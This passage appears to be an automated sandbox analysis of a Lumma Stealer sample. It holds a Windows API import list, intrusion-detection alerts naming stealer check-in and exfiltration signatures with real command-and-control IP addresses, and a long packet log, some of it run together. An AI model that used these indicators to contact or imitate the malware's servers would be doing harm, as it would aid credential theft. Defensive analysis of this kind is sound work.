GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
advapi32.dll | SetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
comctl32.dll | InitCommonControls
kernel32.dll | Sleep
oleaut32.dll | GetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll | InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll | ShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
shell32.dll | SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
comdlg32.dll | GetSaveFileNameW, GetOpenFileNameW
ole32.dll | CoDisconnectObject
advapi32.dll | AdjustTokenPrivileges
oleaut32.dll | SysFreeString
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-22T23:30:19.760409+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:20.486574+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:20.486574+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:21.715303+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:22.496928+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49731 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:22.496928+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:24.417773+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:26.738257+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:28.931974+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:31.637679+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:33.777838+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:34.556675+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49742 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:36.554754+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:40.219207+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:41.011639+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49744 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:45.969482+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 194.58.112.174 | 443 | TCP
2024-12-22T23:30:52.133737+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 104.21.84.113 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 22, 2024 23:30:18.516355991 CET | 49730 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:18.516457081 CET | 443 | 49730 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:18.516571999 CET | 49730 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:18.519726992 CET | 49730 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:18.519763947 CET | 443 | 49730 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:19.760324955 CET | 443 | 49730 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:19.760409117 CET | 49730 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:19.765517950 CET | 49730 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:19.765543938 CET | 443 | 49730 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:19.765944958 CET | 443 | 49730 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:19.819000959 CET | 49730 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:19.837910891 CET | 49730 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:19.837980986 CET | 49730 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:19.838134050 CET | 443 | 49730 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:20.486627102 CET | 443 | 49730 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:20.487032890 CET | 443 | 49730 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:20.487129927 CET | 49730 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:20.488621950 CET | 49730 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:20.488688946 CET | 443 | 49730 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:20.488729000 CET | 49730 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:20.488746881 CET | 443 | 49730 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:20.496095896 CET | 49731 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:20.496140003 CET | 443 | 49731 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:20.496228933 CET | 49731 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:20.498575926 CET | 49731 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:20.498593092 CET | 443 | 49731 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:21.715195894 CET | 443 | 49731 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:21.715302944 CET | 49731 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:21.716609955 CET | 49731 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:21.716619968 CET | 443 | 49731 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:21.716939926 CET | 443 | 49731 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:21.719772100 CET | 49731 | 443 | 192.168.2.4 | 104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:21.719927073 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:21.719954967 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.496932983 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.497015953 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.497060061 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.497095108 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.497108936 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.497127056 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.497136116 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.497139931 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.497231960 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.505203962 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.513597965 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.513659954 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.513673067 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.553369999 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.553379059 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.600267887 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.616867065 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.662745953 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.662754059 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.692511082 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.692559958 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.692569017 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.698834896 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.698880911 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.698887110 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.698992014 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.699049950 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.699192047 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.699210882 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.699223042 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.699229956 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.921307087 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.921341896 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.921444893 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.921770096 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.921783924 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:24.417623997 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:24.417773008 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:24.419234991 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:24.419244051 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:24.419661999 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:24.420950890 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:24.421087027 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:24.421129942 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:24.421195030 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:24.421204090 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:25.402290106 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:25.402549028 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:25.402637005 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:25.402839899 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:25.402868986 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:25.514818907 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:25.514938116 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:25.515033960 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:25.515573025 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:25.515615940 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:26.738147020 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:26.738256931 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:26.739577055 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:26.739598989 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:26.740550041 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:26.749300003 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:26.749422073 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:26.749476910 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:27.531897068 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:27.532018900 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:27.532113075 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:27.532233000 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:27.532257080 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:27.712534904 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:27.712582111 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:27.712646961 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:27.712970972 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:27.712984085 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:28.931811094 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:28.931973934 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:28.933257103 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:28.933304071 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:28.934062958 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:28.939979076 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:28.940136909 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:28.940188885 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:28.940301895 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:28.940318108 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:29.956307888 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:29.956469059 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:29.956609964 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:29.956688881 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:29.956712961 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:30.414041042 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:30.414165974 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:30.414256096 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:30.414581060 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:30.414618015 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:31.637579918 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:31.637679100 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:31.639188051 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:31.639218092 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:31.640290022 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:31.649317026 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:31.649425030 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:31.649470091 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:32.400566101 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:32.400827885 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:32.400897980 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:32.401068926 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:32.401088953 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:32.556844950 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:32.556945086 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:32.557039976 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:32.557411909 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:32.557441950 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:33.777729034 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:33.777837992 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:33.784328938 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:33.784342051 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:33.784656048 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:33.785820007 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:33.786098003 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:33.786103964 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:34.556624889 CET44349742104.21.63.229192.168.2.4
Dec 22, 2024 23:30:34.556763887 CET | 443 | 49742 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:34.556832075 CET | 49742 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:34.557034016 CET | 49742 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:34.557049036 CET | 443 | 49742 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:35.331476927 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:35.331569910 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:35.331746101 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:35.332077980 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:35.332113028 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.554636955 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.554754019 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.556058884 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.556092978 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.556598902 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.573779106 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.574485064 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.574572086 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.574675083 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.574729919 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.574826956 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.574872971 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.574951887 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.575167894 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.575221062 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.575233936 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.575299025 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.575406075 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.575531960 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.575562954 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.575676918 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.575706959 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.575728893 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.575850010 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.575881004 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.575967073 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.576095104 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.576123953 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.576174021 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.576261997 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.619380951 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.619488001 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.663352013 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.815033913 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.815234900 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.815294981 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.815371990 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.815397024 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.815432072 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.815546036 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:36.815589905 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.935415030 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:36.935520887 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:38.975552082 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:38.975647926 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:38.975733995 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:38.975914955 CET | 49743 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:38.975960016 CET | 443 | 49743 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:39.004894972 CET | 49744 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:39.004986048 CET | 443 | 49744 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:39.005091906 CET | 49744 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:39.005372047 CET | 49744 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:39.005403042 CET | 443 | 49744 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:40.219105005 CET | 443 | 49744 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:40.219207048 CET | 49744 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:40.222902060 CET | 49744 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:40.222929955 CET | 443 | 49744 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:40.223217010 CET | 443 | 49744 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:40.224319935 CET | 49744 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:40.224355936 CET | 49744 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:40.224417925 CET | 443 | 49744 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:41.011619091 CET | 443 | 49744 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:41.011710882 CET | 443 | 49744 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:41.011864901 CET | 49744 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:41.011960983 CET | 49744 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:41.012000084 CET | 443 | 49744 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:41.012027979 CET | 49744 | 443 | 192.168.2.4 | 104.21.63.229
Dec 22, 2024 23:30:41.012044907 CET | 443 | 49744 | 104.21.63.229 | 192.168.2.4
Dec 22, 2024 23:30:41.154028893 CET | 49745 | 443 | 192.168.2.4 | 194.58.112.174
Dec 22, 2024 23:30:41.154102087 CET | 443 | 49745 | 194.58.112.174 | 192.168.2.4
Dec 22, 2024 23:30:41.154198885 CET | 49745 | 443 | 192.168.2.4 | 194.58.112.174
Dec 22, 2024 23:30:41.154464006 CET | 49745 | 443 | 192.168.2.4 | 194.58.112.174
Dec 22, 2024 23:30:41.154496908 CET | 443 | 49745 | 194.58.112.174 | 192.168.2.4
